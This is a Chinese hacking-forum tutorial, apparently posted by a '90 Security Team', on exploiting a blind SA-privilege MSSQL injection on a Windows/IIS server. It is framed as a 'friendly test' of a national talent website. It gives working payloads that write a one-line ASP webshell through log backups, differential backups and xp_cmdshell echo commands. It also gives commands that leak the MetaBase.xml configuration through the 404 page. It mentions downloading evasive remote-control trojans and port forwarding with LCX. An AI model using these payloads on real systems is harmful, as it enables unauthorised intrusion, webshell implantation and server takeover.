sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
, H" E6 g* g9 R5 ~4 I3 [4 T

                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
% l# B# [6 `6 c8 Z
: t( w% B- o6 f0 {4 V                                                                 
) q& z5 ~5 F" n3 N2 F- ~- m                                                                 
# k2 K1 {% o1 b9 B2 L" O                                                                  论坛： http://www.90team.net/
8 S) P( m0 {& B$ X
+ k) p! {, [) \$ U8 U

) G  l3 M: f9 {) C友情检测国家人才网
( _' a, m# ], N; c: F
# q  P* Y+ ^) f/ p' [
内容：MSSQL注入SA权限不显错模式下的入侵

7 ]2 H8 l$ F  @2 ]6 c
/ j$ w* P# w# p) S/ X一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

: I6 y, p  n0 O! _& Q我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
  X3 e3 y2 h) i9 k7 A4 L4 M! ^
4 }* ]; ]4 ^% w* g- L思路：

; w, v6 k# N" I! v- X7 O. s$ m首先：

/ J- X/ D0 ~: h9 r8 Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell

2 }+ T  n7 R6 E% C( q2.数据库差异备份获得Webshell

6 w- ]6 O- ~5 m- x+ M  h+ t: f# I4.直接下载免杀远控木马。
$ d7 q( K7 C) ^. L. Z( `+ x7 Z' }
3 o4 G0 L% p" K$ q4 l5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。



在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
. g! r$ u9 Q8 \# T$ F2 U
+ b, J2 C. s: `" z( u4 p我直接演示后面一个方法
# x  A: d2 a) ^3 b4 q& S. H1 x6 R

分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL


( B2 ]- @8 Y& S/ q
! ~2 h* I0 _% j2 ~! P& m
◆日志备份：

! E8 y: A5 e+ k( K8 r& q  @
7 z& d, B9 n3 E' M5 d5 k1. 进行初始备份
! o/ w* _! C/ ]5 a, `; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
* P" R! D8 c9 @6 U
; x4 C1 }8 h, r. @$ w! f: k  W9 n2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

. e2 e5 b- e( q: R, g, |& d0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 y) X7 J+ e( ~0 H: l0 ]4 Z  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( q0 f: y+ s5 B  A% R


, g: Q' e, y7 V& J8 z◆数据库差异备份

（1. 进行差异备份准备工作
$ ~; S1 @9 r8 ?7 Z; X% ?
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
7 L1 s* g# g8 \' k( k+ `6 A
0 M, b$ _9 p, ]% t上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
. i* v9 w1 M  E4 y# t4 M5 O$ x

（2. 将数据写入到数据库
& l# V( D5 k, o0 k;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

; n, }0 Y, J+ g1 O0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

: [- j2 ?. h/ d3 ]" n3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
$ B( S# I9 q& L. a
# [: T- d/ e+ b8 h% j3 d$ d0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


2 r) a) t# c( a
用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径

0 h( K& D) P7 r5 F8 v     
2 p8 u. N2 D6 D2 ]4 y     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
% q2 s7 M: e. l  t* S) `1 w' @
执行命令
     
7 f$ o2 p  J5 o# i% U: U     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
6 T+ Y1 r0 _$ c, J- E7 [4 m* B



" S8 x5 @* n& O0 k9 w

+ l" m1 i) k2 G; S$ E
  E7 s; a/ ~, `) [6 [
. O  T$ t% A4 O+ P
: V& ], d: T/ {; H
  h1 z- _- q) a5 |% ^7 `# k$ c# A


; {: r6 H. ?* h2 l% n( D

3 v1 q/ J- d; S: g2 |# o8 Z

% }. ~9 Z: B7 Y+ m" T5 z1 J
  O5 Y  E: q. `7 K; e2 @

- h; a$ e" f" N- U
( K- O- y: \. A! c8 ]: w1 _& c



9 S; c3 r" y+ g3 I) r5 \( h

) ?5 \/ v2 X* G% [

" E$ D, t5 _( U- C& K8 W. G

* O, N6 ~1 h6 w, L! `, m8 [) W

8 n- B  V; Y+ |) g
: _' o. Z6 a" N  c
. q- g# q' f4 Y% n2 d' g: R
) v. Y1 G/ z8 P0 \9 n: L" U
. Z+ h3 a; D9 {- W9 i
; w2 c, Q0 e9 \6 l  \8 h& |


. H! r. l  i1 n  N8 {0 U2 F- g* N  G
3 ^2 K* o/ {8 ]  s+ @3 L7 A! I1 ^2 f. U
( o+ B$ m/ }$ l/ j
% ~* q5 x0 ?: J6 P, m. H. k+ ^


9 L$ A1 M8 k$ {